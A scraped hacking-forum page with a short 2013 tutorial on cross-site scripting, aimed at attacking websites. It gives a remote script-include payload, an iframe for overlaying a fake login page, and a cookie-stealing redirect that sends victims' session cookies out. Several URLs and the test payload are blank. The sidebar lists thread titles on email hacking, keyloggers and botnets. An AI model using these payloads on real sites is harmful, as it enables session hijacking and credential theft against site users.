Ethical Experts
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
HomeHome  SearchSearch  FAQFAQ  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!

Display results as :
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Basics of XSS Hacking EmptyTue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Basics of XSS Hacking EmptyFri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Basics of XSS Hacking EmptyThu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Basics of XSS Hacking EmptySat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Basics of XSS Hacking EmptySat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Basics of XSS Hacking EmptySat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Basics of XSS Hacking EmptyWed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Basics of XSS Hacking EmptyFri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Basics of XSS Hacking EmptyFri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
Hack Your BroadBand !! RISK FREE !!
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
Hacking With Keyloggers Prorat
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
hack netcat LARGEST wifi
Facebook Like
Similar topics


     Basics of XSS Hacking

    Go down 
    Team IHA Admins
    Team IHA Admins

    Posts : 11
    Join date : 2013-10-12

    Basics of XSS Hacking Empty
    PostSubject: Basics of XSS Hacking   Basics of XSS Hacking EmptyMon Oct 21, 2013 1:32 am

    Basics of XSS Hacking
    Cross-site scripting (Popularly known as XSS) and SQL injection errors are two prominent vulnerabilities that have been responsible for a large number of security breaches in recent years. XSS is a huge problem in current scenario as most of the web developers are even not aware of this kind of attack. The basic differences between SQL Injection & XSS are:

    SQL Injection is the injection of SQL Statements whereas XSS is the Injection of Codes (It can be Javascript, PHP code, VB Code or even regular HTML Codes.
    SQL Injection is injecting a SQL statement into the query execution function in the server side script. But, XSS can be both Client & Server Side. (Stored or persistent XSS is Server Side whereas Non-persistent is Client Side as an attacker needs to insert code each time.)

    Together XSS and SQL Injection is the most deadly combination that can be found today and more than 90% of the sites are vulnerable to any one of the following. In SQL injection, the user can add additional conditions or commands to a database query, thus allowing the user to bypass authentication or alter data. With XSS, an attacker can inject this own HTML (including JavaScript or other executable code) into a web page; this is exploitable in many ways, up to complete compromise of the browser. XSS is used by a phisher to inject credential stealing code into official sites without having to redirect the user to a copy of the site. This means that any security credentials will be valid on the attack site and even white-listing will not prevent the attack.

    So, let’s start how this XSS Attack actually takes place.

    XSS Attack can be of many types:
    Non-persistent or reflected
    DOM-based or Local cross-site scripting
    Stored or persistent

    Now have a look at an example. Let's say that we have a vulnerable page. A malicious user, Hacker, posts a "special_code" post, containing the following:

    <script type="text/javascript" src=""></script>

    If the page is vulnerable, then everyone who visits the page, the browser will fetch the file located at, and then execute the code in it.

    How to find if a website is vulnerable to XSS?

    To find out if any website is vulnerable to XSS, what you need to do is just insert the script into any search or input text field.


    If upon Submitting, the page return an alert with “hi” in it, then that particular website should be vulnerable to XSS Attack.

    Now you can insert link to any third party website or fake login page in the script tag and that link gets stored with the original content. We can also insert links to javascripts, which will allow the hacker to run malicious code included in the javascript upon page reloading and basically hijack any session of users accessing that particular page. Session hijacking refers to the fact that the hacker can now login into the website without even victim’s username or password. This is done by inserting cookie stealing code in the javascript.

    We can insert link to any image into the vulnerable website by giving the following script in the search or text input field which is vulnerable to XSS.

    <iframe src=”url of the fake page” width=”1000” height=”1000” />

    It can be anything like:

    <iframe src=”” width=”1000” height=”1000” />

    One can also paste pages into the victim website:

    <script>document.location.href=""+document.cookie; </script>

    Hope, you enjoyed and learnt a lot.
    Happy Hacking!
    Back to top Go down
    View user profile
    Basics of XSS Hacking
    Back to top 
    Page 1 of 1
     Similar topics
    » Street Fighting Basics

    Permissions in this forum:You cannot reply to topics in this forum
    Ethical Experts :: Hacking Section :: Hacking Tutorials-
    Jump to: